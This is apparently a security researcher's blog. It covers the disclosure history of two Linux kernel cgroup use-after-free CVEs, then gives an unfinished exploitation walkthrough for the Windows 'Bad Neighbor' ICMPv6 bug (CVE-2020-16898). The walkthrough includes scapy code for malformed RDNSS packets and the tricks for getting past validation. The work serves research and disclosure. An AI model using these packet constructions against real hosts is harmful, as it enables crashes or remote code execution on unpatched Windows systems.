[   72.121582]  cgroup_sk_alloc_disable.cold+0x11/0x25
                ^^^^^^^^^^^^^^^^^^^^^^^
[   72.121584]  net_prio_attach+0x22/0xa0
                ^^^^^^^^^^^^^^^
[   72.121586]  cgroup_migrate_execute+0x371/0x430
[   72.121587]  cgroup_attach_task+0x132/0x1f0
[   72.121588]  __cgroup1_procs_write.constprop.0+0xff/0x140
                ^^^^^^^^^^^^^^^^^^^^^^
[   72.121590]  kernfs_fop_write+0xc9/0x1a0
[   72.121592]  vfs_write+0xb1/0x1a0
[   72.121593]  ksys_write+0x5a/0xd0
[   72.121595]  do_syscall_64+0x47/0x190
[   72.121596]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[   72.121598] RIP: 0033:0x48abdb
[   72.121599] Code: ff e9 69 ff ff ff cc cc cc cc cc cc cc cc cc e8 7b 68 fb ff 48 8b 7c 24 10 48 8b 74 24 18 48 8b 54 24 20 48 8b 44 24 08 0f 05 <48> 3d 01 f0 ff ff 76 20 48 c7 44 24 28 ff ff ff ff 48 c7 44 24 30
[   72.121600] RSP: 002b:000000c00110f778 EFLAGS: 00000212 ORIG_RAX: 0000000000000001
[   72.121601] RAX: ffffffffffffffda RBX: 000000c000060000 RCX: 000000000048abdb
[   72.121601] RDX: 0000000000000004 RSI: 000000c00110f930 RDI: 000000000000001e
[   72.121601] RBP: 000000c00110f7c8 R08: 000000c00110f901 R09: 0000000000000004
[   72.121602] R10: 000000c0011a39a0 R11: 0000000000000212 R12: 000000000000019b
[   72.121602] R13: 000000000000019a R14: 0000000000000200 R15: 0000000000000000

As we can see, net_prio is being activated and cgroup2 socket matching is being disabled. Next:

[  287.497527] percpu ref (cgroup_bpf_release_fn) <= 0 (-79) after switching to atomic
[  287.497535] WARNING: CPU: 0 PID: 9 at lib/percpu-refcount.c:161 percpu_ref_switch_to_atomic_rcu+0x11f/0x12a
[  287.497536] Modules linked in:
[  287.497537] CPU: 0 PID: 9 Comm: ksoftirqd/0 Kdump: loaded Not tainted 5.7.0-g6 #32
[  287.497538] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 04/13/2018
[  287.497539] RIP: 0010:percpu_ref_switch_to_atomic_rcu+0x11f/0x12a

cgroup_bpf_release_fn is being executed multiple times. All cgroup BPF entries has been deleted and freed. Next:

[  287.543976] general protection fault, probably for non-canonical address 0x6b6b6b6b6b6b6b6b: 0000 [#1] PREEMPT SMP PTI
[  287.544062] CPU: 0 PID: 11398 Comm: realpath Kdump: loaded Tainted: G        W         5.7.0-g6 #32
[  287.544133] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 04/13/2018
[  287.544217] RIP: 0010:__cgroup_bpf_run_filter_skb+0xd4/0x230
[  287.544267] Code: 00 48 01 c8 48 89 43 50 41 83 ff 01 0f 84 c2 00 00 00 e8 6f 55 f1 ff e8 5a 3e f5 ff 44 89 fa 48 8d 84 d5 e0 03 00 00 48 8b 00 <48> 8b 78 10 4c 8d 78 10 48 85 ff 0f 84 29 01 00 00 bd 01 00 00 00
[  287.544398] RSP: 0018:ffff957740003af8 EFLAGS: 00010206
[  287.544446] RAX: 6b6b6b6b6b6b6b6b RBX: ffff8911f339cf00 RCX: 0000000000000028
[  287.544506] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000001
[  287.544566] RBP: ffff8911e2eb5000 R08: 0000000000000000 R09: 0000000000000001
[  287.544625] R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000014
[  287.544685] R13: 0000000000000014 R14: 0000000000000000 R15: 0000000000000000
[  287.544753] FS:  00007f86e885a580(0000) GS:ffff8911f6e00000(0000) knlGS:0000000000000000
[  287.544833] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  287.544919] CR2: 000055fb75e86da4 CR3: 0000000221316003 CR4: 00000000003606f0
[  287.544996] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[  287.545063] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[  287.545129] Call Trace:
[  287.545167]  <IRQ>
[  287.545204]  sk_filter_trim_cap+0x10c/0x250
[  287.545253]  ? nf_ct_deliver_cached_events+0xb6/0x120
[  287.545308]  ? tcp_v4_inbound_md5_hash+0x47/0x160
[  287.545359]  tcp_v4_rcv+0xb49/0xda0
[  287.545404]  ? nf_hook_slow+0x3a/0xa0
[  287.545449]  ip_protocol_deliver_rcu+0x26/0x1d0
[  287.545500]  ip_local_deliver_finish+0x50/0x60
[  287.545550]  ip_sublist_rcv_finish+0x38/0x50
[  287.545599]  ip_sublist_rcv+0x16d/0x200
[  287.545645]  ? ip_rcv_finish_core.constprop.0+0x470/0x470
[  287.545701]  ip_list_rcv+0xf1/0x115
[  287.545746]  __netif_receive_skb_list_core+0x249/0x270
[  287.545801]  netif_receive_skb_list_internal+0x19f/0x2c0
[  287.545856]  napi_complete_done+0x8e/0x130
[  287.545905]  e1000_clean+0x27e/0x600
[  287.545951]  ? security_cred_free+0x37/0x50
[  287.545999]  net_rx_action+0x133/0x3b0
[  287.546045]  __do_softirq+0xfc/0x331
[  287.546091]  irq_exit+0x92/0x110
[  287.546133]  do_IRQ+0x6d/0x120
[  287.546175]  common_interrupt+0xf/0xf
[  287.546219]  </IRQ>
[  287.546255] RIP: 0010:__x64_sys_exit_group+0x4/0x10

We have our crash referencing freed memory. 

First CVE – CVE-2020-14356:

I’ve decided to report this issue to the Linux Kernel security mailing list around the mid-July (2020). Roman Gushchin replied to my report and suggested to verify if I can still repro this issue when commit ad0f75e5f57c (“cgroup: fix cgroup_sk_alloc() for sk_clone_lock()”) is applied. This commit was merged to the Linux Kernel git source tree just a few days before my report. I’ve carefully verified it and indeed it fixed the problem. However, commit ad0f75e5f57c is not fully complete and a follow-up fix 14b032b8f8fc (“cgroup: Fix sock_cgroup_data on big-endian.”) should be applied as well.


After this conversation Greg KH decided to backport Roman’s patches to the LTS kernels. In the meantime, I’ve decided to apply for CVE number (through RedHat) to track this issue:

  1. CVE-2020-14356 was allocated to track this issue
  2. For some unknown reasons, this bug was classified as NULL pointer dereference 🙂

RedHat correctly acknowledged this issue as Use-After-Free and in their own description and bugzilla they specify:

However, in CVE MITRE portal we can see a very inaccurate description:

  • “A flaw null pointer dereference in the Linux kernel cgroupv2 subsystem in versions before 5.7.10 was found in the way when reboot the system. A local user could use this flaw to crash the system or escalate their privileges on the system.”
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14356

First, it is not NULL pointer dereference but Use-After-Free bug. Maybe it is badly classified based on that opened bug:
https://bugzilla.kernel.org/show_bug.cgi?id=208003

People have started to hit this Use-After-Free bug in the form of NULL pointer dereference “kernel panic”.

Additionally, the entire description of the bug is wrong. I’ve raised that concern to the CVE MITRE but the invalid description is still there. There is also a small Twitter discussion about that here:
https://twitter.com/Adam_pi3/status/1296212546043740160

Second CVE – CVE-2020-25220:

During analysis of this bug, I contacted Brad Spengler. When the patch for this issue was backported to LTS kernels, Brad noticed that it conflicted with his pre-existing backport, and that the upstream backport looked incorrect. I was surprised since I had reviewed the original commit for mainline kernel (5.7) and it was fine. Having this in mind, I decided to carefully review the backported patch:
https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?h=linux-4.14.y&id=82fd2138a5ffd7e0d4320cdb669e115ee976a26e

and it really looks incorrect. Part of the original fix is the following code:

+void cgroup_sk_clone(struct sock_cgroup_data *skcd)
+{
+   if (skcd->val) {
+       if (skcd->no_refcnt)
+           return;
+       /*
+        * We might be cloning a socket which is left in an empty
+        * cgroup and the cgroup might have already been rmdir'd.
+        * Don't use cgroup_get_live().
+        */
+       cgroup_get(sock_cgroup_ptr(skcd));
+       cgroup_bpf_get(sock_cgroup_ptr(skcd));
+   }
+}

However, backported patch has the following logic:

+void cgroup_sk_clone(struct sock_cgroup_data *skcd)
+{
+   /* Socket clone path */
+   if (skcd->val) {
+       /*
+        * We might be cloning a socket which is left in an empty
+        * cgroup and the cgroup might have already been rmdir'd.
+        * Don't use cgroup_get_live().
+        */
+       cgroup_get(sock_cgroup_ptr(skcd));
+   }
+}

There is a missing check:

+       if (skcd->no_refcnt)
+           return;

which could result in reference counter bug and in the end Use-After-Free again. It looks like the backported patch for stable kernels is still buggy.

I’ve contacted RedHat again and they started to provide correct patches for their own kernels. However, LTS kernels were still buggy. I’ve also asked to assign a separate CVE for that issue but RedHat suggested that I do it myself.

After that, I went for vacation and forgot about this issue 🙂 Recently, I’ve decided to apply for CVE to track the “bad patch” issue, and CVE-2020-25220 was allocated. It is worth to point out that someone from Huawei at some point realized that patch is wrong and LTS got a correct fix as well:

https://www.spinics.net/lists/stable/msg405099.html

What is worth to mention, grsecurity backport was never affected by the CVE-2020-25220.

Summary:

Original issue, tracked by CVE-2020-14356, affects kernels starting from 4.5+ up to 5.7.10.

  • RedHat correctly fixed all their kernels, and has proper description of the bug
  • CVE MITRE still has invalid and misleading description

Badly backported patch, tracked by CVE-2020-25220, affects kernels:

  • 4.19 until version 4.19.140 (exclusive)
  • 4.14 until version 4.14.194 (exclusive)
  • 4.9 until version 4.9.233 (exclusive)

*grsecurity kernels were never affected by the CVE-2020-25220


Best regards,
Adam ‘pi3’ Zabrocki

CVE-2020-16898 – Exploiting “Bad Neighbor” vulnerability

16 October 2020 at 18:57
By: pi3

Introduction

During the last Patch Tuesday (13th of October 2020), Microsoft fixed a very interesting (and sexy) vulnerability: CVE-2020-16898 – Windows TCP/IP Remote Code Execution Vulnerability (link). Microsoft’s description of the vulnerability:

“A remote code execution vulnerability exists when the Windows TCP/IP stack improperly handles ICMPv6 Router Advertisement packets. An attacker who successfully exploited this vulnerability could gain the ability to execute code on the target server or client.
To exploit this vulnerability, an attacker would have to send specially crafted ICMPv6 Router Advertisement packets to a remote Windows computer.
The update addresses the vulnerability by correcting how the Windows TCP/IP stack handles ICMPv6 Router Advertisement packets.”

This vulnerability is so important that I’ve decided to write a Proof-of-Concept for it. During my work there weren’t any public exploits for it. I’ve spent a significant amount of time analyzing all the necessary caveats needed for triggering the bug. Even now, available information doesn’t provide sufficient details for triggering the bug. That’s why I’ve decided to summarize my experience. First, short summary:

  • This bug can ONLY be exploited when source address is link-local IPv6. This requirement is limiting the potential targets!
  • The entire payload must be a valid IPv6 packet. If you screw-up headers too much, your packet will be rejected before triggering the bug
  • During the process of validating the size of the packet, all defined “length” in Optional headers must match the packet size
  • This vulnerability allows to smuggle an extra “header”. This header is not validated and includes “Length” field. After triggering the bug, this field will be inspected against the packet size anyway.
  • Windows NDIS API, which can trigger the bug, has a very annoying optimization (from the exploitation perspective). To be able to bypass it, you need to use fragmentation! Otherwise, you can trigger the bug, but it won’t result in memory corruption!

Collecting information about the vulnerability

At first, I wanted to learn more about the bug. The only extra information which I could find were the write-ups provided by the detection logic. This is quite a funny twist of fate that the information on how to protect against attack was helpful in exploitation 🙂 Write-ups:

The most crucial is the following information:

“While we ignore all Options that aren’t RDNSS, for Option Type = 25 (RDNSS), we check to see if the Length (second byte in the Option) is an even number. If it is, we flag it. If not, we continue. Since the Length is counted in increments of 8 bytes, we multiply the Length by 8 and jump ahead that many bytes to get to the start of the next Option (subtracting 1 to account for the length byte we’ve already consumed).”

OK, what we have learned from it? Quite a lot:

  • We need to send RDNSS packet
  • The problem is an even number in the Length field
  • Function responsible for parsing the packet will reference the last 8 bytes of RDNSS payload as a next header

That’s more than enough to start poking around. First, we need to generate a valid RDNSS packet.

RDNSS

Recursive DNS Server Option (RDNSS) is one of the sub-options for Router Advertisement (RA) message. RA can be sent via ICMPv6. Let’s look at the documentation for RDNSS (https://tools.ietf.org/html/rfc5006):

5.1. Recursive DNS Server Option
The RDNSS option contains one or more IPv6 addresses of recursive DNS
servers. All of the addresses share the same lifetime value. If it
is desirable to have different lifetime values, multiple RDNSS
options can be used. Figure 1 shows the format of the RDNSS option.

  0                   1                   2                   3
  0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 |     Type      |     Length    |           Reserved            |
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 |                           Lifetime                            |
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 |                                                               |
 :            Addresses of IPv6 Recursive DNS Servers            :
 |                                                               |
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Description of the Length field:

 Length        8-bit unsigned integer.  The length of the option
               (including the Type and Length fields) is in units of
               8 octets.  The minimum value is 3 if one IPv6 address
               is contained in the option.  Every additional RDNSS
               address increases the length by 2.  The Length field
               is used by the receiver to determine the number of
               IPv6 addresses in the option.

This essentially means that Length must always be an odd number as long as there is any payload.
OK, let’s create a RDNSS package. How to do it? I’m using scapy since it’s the easiest and fasted way for creating any packages which we want. It is very simple:

v6_dst = <destination address>
v6_src = <source address>

c = ICMPv6NDOptRDNSS()
c.len = 7
c.dns = [ "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]

pkt = IPv6(dst=v6_dst, src=v6_src, hlim=255) / ICMPv6ND_RA() / c
send(pkt)

When we set-up a kernel debugger and analyze all the public symbols from the tcpip.sys driver we can find interesting function names:

tcpip!Ipv6pHandleRouterAdvertisement
tcpip!Ipv6pUpdateRDNSS

Let’s try to set the breakpoints there and see if our package arrives:

0: kd> bp tcpip!Ipv6pUpdateRDNSS
0: kd> bp tcpip!Ipv6pHandleRouterAdvertisement
0: kd> g
Breakpoint 0 hit
tcpip!Ipv6pHandleRouterAdvertisement:
fffff804`483ba398 48895c2408      mov     qword ptr [rsp+8],rbx
0: kd> kpn
 # Child-SP          RetAddr           Call Site
00 fffff804`48a66ad8 fffff804`483c04e0 tcpip!Ipv6pHandleRouterAdvertisement
01 fffff804`48a66ae0 fffff804`4839487a tcpip!Icmpv6ReceiveDatagrams+0x340
02 fffff804`48a66cb0 fffff804`483cb998 tcpip!IppProcessDeliverList+0x30a
03 fffff804`48a66da0 fffff804`483906df tcpip!IppReceiveHeaderBatch+0x228
04 fffff804`48a66ea0 fffff804`4839037c tcpip!IppFlcReceivePacketsCore+0x34f
05 fffff804`48a66fb0 fffff804`483b24ce tcpip!IpFlcReceivePackets+0xc
06 fffff804`48a66fe0 fffff804`483b19a2 tcpip!FlpReceiveNonPreValidatedNetBufferListChain+0x25e
07 fffff804`48a670d0 fffff804`45a4f698 tcpip!FlReceiveNetBufferListChainCalloutRoutine+0xd2
08 fffff804`48a67200 fffff804`45a4f60d nt!KeExpandKernelStackAndCalloutInternal+0x78
09 fffff804`48a67270 fffff804`483a1741 nt!KeExpandKernelStackAndCalloutEx+0x1d
0a fffff804`48a672b0 fffff804`4820b530 tcpip!FlReceiveNetBufferListChain+0x311
0b fffff804`48a67550 ffffcb82`f9dfb370 0xfffff804`4820b530
0c fffff804`48a67558 fffff804`48a676b0 0xffffcb82`f9dfb370
0d fffff804`48a67560 00000000`00000000 0xfffff804`48a676b0
0: kd> g
...

Hm… OK. We never hit Ipv6pUpdateRDNSS but we did hit Ipv6pHandleRouterAdvertisement. This means that our package is fine. Why the hell we did not end up in Ipv6pUpdateRDNSS?

Problem 1 – IPv6 link-local address

We are failing validation of the address here:

fffff804`483ba4b4 458a02          mov     r8b,byte ptr [r10]
fffff804`483ba4b7 8d5101          lea     edx,[rcx+1]
fffff804`483ba4ba 8d5902          lea     ebx,[rcx+2]
fffff804`483ba4bd 41b7c0          mov     r15b,0C0h
fffff804`483ba4c0 4180f8ff        cmp     r8b,0FFh
fffff804`483ba4c4 0f84a8820b00    je      tcpip!Ipv6pHandleRouterAdvertisement+0xb83da (fffff804`48472772)
fffff804`483ba4ca 33c0            xor     eax,eax
fffff804`483ba4cc 498bca          mov     rcx,r10
fffff804`483ba4cf 48898570010000  mov     qword ptr [rbp+170h],rax
fffff804`483ba4d6 48898578010000  mov     qword ptr [rbp+178h],rax
fffff804`483ba4dd 4484d2          test    dl,r10b
fffff804`483ba4e0 0f8599820b00    jne     tcpip!Ipv6pHandleRouterAdvertisement+0xb83e7 (fffff804`4847277f)
fffff804`483ba4e6 4180f8fe        cmp     r8b,0FEh
fffff804`483ba4ea 0f85ab820b00    jne     tcpip!Ipv6pHandleRouterAdvertisement+0xb8403 (fffff804`4847279b) [br=0]

r10 points to the beginning of the address:

0: kd> dq @r10
ffffcb82`f9a5b03a  000052b0`80db12fd e5f5087c`645d7b5d
ffffcb82`f9a5b04a  000052b0`80db12fd b7220a02`ea3b3a4d
ffffcb82`f9a5b05a  08070800`e56c0086 00000000`00000000
ffffcb82`f9a5b06a  ffffffff`00000719 aaaaaaaa`aaaaaaaa
ffffcb82`f9a5b07a  aaaaaaaa`aaaaaaaa aaaaaaaa`aaaaaaaa
ffffcb82`f9a5b08a  aaaaaaaa`aaaaaaaa aaaaaaaa`aaaaaaaa
ffffcb82`f9a5b09a  aaaaaaaa`aaaaaaaa 63733a6e`12990c28
ffffcb82`f9a5b0aa  70752d73`616d6568 643a6772`6f2d706e

These bytes:

ffffcb82`f9a5b03a  000052b0`80db12fd e5f5087c`645d7b5d

are matching my IPv6 address which I’ve used as a source address:

v6_src = "fd12:db80:b052:0:5d7b:5d64:7c08:f5e5"

It is compared with byte 0xFE. By looking here We can learn that:

fe80::/10 — Addresses in the link-local prefix are only valid and unique on a single link (comparable to the auto-configuration addresses 169.254.0.0/16 of IPv4).

OK, so it is looking for the link-local prefix. Another interesting check is when we fail the previous one:

fffff804`4847279b e8f497f8ff      call    tcpip!IN6_IS_ADDR_LOOPBACK (fffff804`483fbf94)
fffff804`484727a0 84c0            test    al,al
fffff804`484727a2 0f85567df4ff    jne     tcpip!Ipv6pHandleRouterAdvertisement+0x166 (fffff804`483ba4fe)
fffff804`484727a8 4180f8fe        cmp     r8b,0FEh
fffff804`484727ac 7515            jne     tcpip!Ipv6pHandleRouterAdvertisement+0xb842b (fffff804`484727c3)

It is checking if we are coming from the LOOPBACK, and next we are validated again for being the link-local. I’ve modified the packet to use link-local address and…

Breakpoint 1 hit
tcpip!Ipv6pUpdateRDNSS:
fffff804`4852a534 4055            push    rbp
0: kd> kpn
 # Child-SP          RetAddr           Call Site
00 fffff804`48a66728 fffff804`48472cbf tcpip!Ipv6pUpdateRDNSS
01 fffff804`48a66730 fffff804`483c04e0 tcpip!Ipv6pHandleRouterAdvertisement+0xb8927
02 fffff804`48a66ae0 fffff804`4839487a tcpip!Icmpv6ReceiveDatagrams+0x340
03 fffff804`48a66cb0 fffff804`483cb998 tcpip!IppProcessDeliverList+0x30a
04 fffff804`48a66da0 fffff804`483906df tcpip!IppReceiveHeaderBatch+0x228
05 fffff804`48a66ea0 fffff804`4839037c tcpip!IppFlcReceivePacketsCore+0x34f
06 fffff804`48a66fb0 fffff804`483b24ce tcpip!IpFlcReceivePackets+0xc
07 fffff804`48a66fe0 fffff804`483b19a2 tcpip!FlpReceiveNonPreValidatedNetBufferListChain+0x25e
08 fffff804`48a670d0 fffff804`45a4f698 tcpip!FlReceiveNetBufferListChainCalloutRoutine+0xd2
09 fffff804`48a67200 fffff804`45a4f60d nt!KeExpandKernelStackAndCalloutInternal+0x78
0a fffff804`48a67270 fffff804`483a1741 nt!KeExpandKernelStackAndCalloutEx+0x1d
0b fffff804`48a672b0 fffff804`4820b530 tcpip!FlReceiveNetBufferListChain+0x311
0c fffff804`48a67550 ffffcb82`f9dfb370 0xfffff804`4820b530
0d fffff804`48a67558 fffff804`48a676b0 0xffffcb82`f9dfb370
0e fffff804`48a67560 00000000`00000000 0xfffff804`48a676b0

Works! OK, let’s move to the triggering bug phase.

Triggering the bug

What we know from the detection logic write-up:

“we check to see if the Length (second byte in the Option) is an even number”

Let’s test it:

v6_dst = <destination address>
v6_src = <source address>

c = ICMPv6NDOptRDNSS()
c.len = 6
c.dns = [ "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]

pkt = IPv6(dst=v6_dst, src=v6_src, hlim=255) / ICMPv6ND_RA() / c
send(pkt)

and we end up executing this code:

fffff804`4852a5b3 4c8b15be8b0700  mov     r10,qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff804`485a3178)]
fffff804`4852a5ba e8113bceff      call    fffff804`4820e0d0
fffff804`4852a5bf 418bd7          mov     edx,r15d
fffff804`4852a5c2 498bce          mov     rcx,r14
fffff804`4852a5c5 488bd8          mov     rbx,rax
fffff804`4852a5c8 e8a39de5ff      call    tcpip!NetioAdvanceNetBuffer (fffff804`48384370)
fffff804`4852a5cd 0fb64301        movzx   eax,byte ptr [rbx+1]
fffff804`4852a5d1 8d4e01          lea     ecx,[rsi+1]
fffff804`4852a5d4 2bc6            sub     eax,esi
fffff804`4852a5d6 4183cfff        or      r15d,0FFFFFFFFh
fffff804`4852a5da 99              cdq
fffff804`4852a5db f7f9            idiv    eax,ecx
fffff804`4852a5dd 8b5304          mov     edx,dword ptr [rbx+4]
fffff804`4852a5e0 8945b7          mov     dword ptr [rbp-49h],eax
fffff804`4852a5e3 8bf0            mov     esi,eax
fffff804`4852a5e5 413bd7          cmp     edx,r15d
fffff804`4852a5e8 7412            je      tcpip!Ipv6pUpdateRDNSS+0xc8 (fffff804`4852a5fc)

Essentially, it subtracts 1 from the Length field and the result is divided by 2. This follows the documentation logic and can be summarized as:

tmp = (Length - 1) / 2

This logic generates the same result for the odd and even number:

(8 – 1) / 2 => 3
(7 – 1) / 2 => 3

There is nothing wrong with that by itself. However, this also “defines” how long is the package. Since IPv6 addresses are 16 bytes long, by providing even number, the last 8 bytes of the payload will be used as a beginning of the next header. We can see that in the Wireshark as well:

Zdjęcie

That’s pretty interesting. However, what to do with that? What next header should we fake? Why this matters at all? Well… it took me some time to figure this out. To be honest, I wrote a simple fuzzer to find it out 🙂

Hunting for the correct header(s) (Problem 2)

If we look in the documentation at the available headers / options, we don’t really know which one to use (https://www.iana.org/assignments/icmpv6-parameters/icmpv6-parameters.xml):

What we do know is that ICMPv6 messages have the following general format:

       0                   1                   2                   3
       0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
      |     Type      |     Code      |          Checksum             |
      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
      |                                                               |
      +                         Message Body                          +
      |                                                               |

First byte is encoding “type” of the package. I’ve made the test and I’ve generated next header to be exactly the same as the “buggy” RDNSS one. I’ve been hitting breakpoint for tcpip!Ipv6pUpdateRDNSS but tcpip!Ipv6pHandleRouterAdvertisement was hit only once. I’ve run my IDA Pro and started to analyze what’s going on and what logic is being executed. After some reverse engineering I realized that we have 2 loops in the code:

  1. First loop goes through all the headers and does some basic validation (size of length etc)
  2. Second loop doesn’t do any more validation but parses the package.

As soon as there are more ‘optional headers’ in the buffer, we are in the loop. That’s a very good primitive! Anyway, I still don’t know what headers should be used and to find it out I had been brute-forcing all the ‘optional header’ types in the triggered bug and found out that second loop cares only about:

  • Type 3 (Prefix Information)
  • Type 24 (Route Information)
  • Type 25 (RDNSS)
  • Type 31 (DNS Search List Option)

I’ve analyzed Type 24 logic since it was much “smaller / shorter” than Type 3.

Stack overflow

OK. Let’s try to generate the malicious RDNSS packet “faking” Route Information as a next one:

v6_dst = <destination address>
v6_src = <source address>

c = ICMPv6NDOptRDNSS()
c.len = 6
c.dns = [ "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:03AA:AAAA:AAAA:AAAA" ]

pkt = IPv6(dst=v6_dst, src=v6_src, hlim=255) / ICMPv6ND_RA() / c
send(pkt)

This never hits tcpip!Ipv6pUpdateRDNSS function.

Problem 3 – size of the package.

After debugging I’ve realized that we are failing in the following check:

fffff804`483ba766 418b4618        mov     eax,dword ptr [r14+18h]
fffff804`483ba76a 413bc7          cmp     eax,r15d
fffff804`483ba76d 0f85d0810b00    jne     tcpip!Ipv6pHandleRouterAdvertisement+0xb85ab (fffff804`48472943)

where eax is the size of the package and r15 keeps an information of how much data were consumed. In that specific case we have:

rax = 0x48
r15 = 0x40

This is exactly 8 bytes difference because we use an even number. To bypass it, I’ve placed another header just after the last one. However, I was still hitting the same problem 🙁 It took me some time to figure out how to play with the packet layout to bypass it. I’ve finally managed to do so.

Problem 4 – size again!

Finally, I’ve found the correct packet layout and I could end up in the code responsible for handling Route Information header. However, I did not 🙂 Here is why. After returning from the RDNSS I ended up here:

fffff804`48472cba e875780b00      call    tcpip!Ipv6pUpdateRDNSS (fffff804`4852a534)
fffff804`48472cbf 440fb77c2462    movzx   r15d,word ptr [rsp+62h]
fffff804`48472cc5 e9c980f4ff      jmp     tcpip!Ipv6pHandleRouterAdvertisement+0x9fb (fffff804`483bad93)
...
fffff804`483bad15 4c8b155c841e00  mov     r10,qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff804`485a3178)] ds:002b:fffff804`485a3178=fffff8044820e0d0
fffff804`483bad1c e8af33e5ff      call    fffff804`4820e0d0
...
fffff804`483bad15 4c8b155c841e00  mov     r10,qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff804`485a3178)]
fffff804`483bad1c e8af33e5ff      call    fffff804`4820e0d0
fffff804`483bad21 0fb64801        movzx   ecx,byte ptr [rax+1]
fffff804`483bad25 66c1e103        shl     cx,3
fffff804`483bad29 66894c2462      mov     word ptr [rsp+62h],cx
fffff804`483bad2e 6685c9          test    cx,cx
fffff804`483bad31 0f8485060000    je      tcpip!Ipv6pHandleRouterAdvertisement+0x1024 (fffff804`483bb3bc)
fffff804`483bad37 0fb7c9          movzx   ecx,cx
fffff804`483bad3a 413b4e18        cmp     ecx,dword ptr [r14+18h] ds:002b:ffffcb82`fcbed1c8=000000b8
fffff804`483bad3e 0f8778060000    ja      tcpip!Ipv6pHandleRouterAdvertisement+0x1024 (fffff804`483bb3bc)

ecx keeps the information about the “Length” of the “fake header”. However, [r14+18h] points to the size of the data left in the package. I set Length to the max (0xFF) which is multiplied by 8 (2040 == 0x7f8). However, there is only “0xb8” bytes left. So, I’ve failed another size validation!

To be able to fix it, I’ve decreased the size of the “fake header” and at the same time attached more data to the package. That worked!

Problem 5 – NdisGetDataBuffer() and fragmentation

I’ve finally found all the puzzles to be able to trigger the bug. I thought so… I ended up executing the following code responsible for handling Route Information message:

fffff804`48472cd9 33c0            xor     eax,eax
fffff804`48472cdb 44897c2420      mov     dword ptr [rsp+20h],r15d
fffff804`48472ce0 440fb77c2462    movzx   r15d,word ptr [rsp+62h]
fffff804`48472ce6 4c8d85b8010000  lea     r8,[rbp+1B8h]
fffff804`48472ced 418bd7          mov     edx,r15d
fffff804`48472cf0 488985b8010000  mov     qword ptr [rbp+1B8h],rax
fffff804`48472cf7 448bcf          mov     r9d,edi
fffff804`48472cfa 488985c0010000  mov     qword ptr [rbp+1C0h],rax
fffff804`48472d01 498bce          mov     rcx,r14
fffff804`48472d04 488985c8010000  mov     qword ptr [rbp+1C8h],rax
fffff804`48472d0b 48898580010000  mov     qword ptr [rbp+180h],rax
fffff804`48472d12 48898588010000  mov     qword ptr [rbp+188h],rax
fffff804`48472d19 4c8b1558041300  mov     r10,qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff804`485a3178)] ds:002b:fffff804`485a3178=fffff8044820e0d0

It tries to get the “Length” bytes from the packet to read the entire header. However, Length is fake and not validated. In my test case it has value “0x100”. Destination address is pointing to the stack which represents Route Information header. It is a very small buffer. So, we should have classic stack overflow, but inside of the NdisGetDataBuffer function I ended-up executing this:

fffff804`4820e10c 8b7910          mov     edi,dword ptr [rcx+10h]
fffff804`4820e10f 8b4328          mov     eax,dword ptr [rbx+28h]
fffff804`4820e112 8bf2            mov     esi,edx
fffff804`4820e114 488d0c3e        lea     rcx,[rsi+rdi]
fffff804`4820e118 483bc8          cmp     rcx,rax
fffff804`4820e11b 773e            ja      fffff804`4820e15b
fffff804`4820e11d f6430a05        test    byte ptr [rbx+0Ah],5 ds:002b:ffffcb83`086a4c7a=0c
fffff804`4820e121 0f84813f0400    je      fffff804`482520a8
fffff804`4820e127 488b4318        mov     rax,qword ptr [rbx+18h]
fffff804`4820e12b 4885c0          test    rax,rax
fffff804`4820e12e 742b            je      fffff804`4820e15b
fffff804`4820e130 8b4c2470        mov     ecx,dword ptr [rsp+70h]
fffff804`4820e134 8d55ff          lea     edx,[rbp-1]
fffff804`4820e137 4803c7          add     rax,rdi
fffff804`4820e13a 4823d0          and     rdx,rax
fffff804`4820e13d 483bd1          cmp     rdx,rcx
fffff804`4820e140 7519            jne     fffff804`4820e15b
fffff804`4820e142 488b5c2450      mov     rbx,qword ptr [rsp+50h]
fffff804`4820e147 488b6c2458      mov     rbp,qword ptr [rsp+58h]
fffff804`4820e14c 488b742460      mov     rsi,qword ptr [rsp+60h]
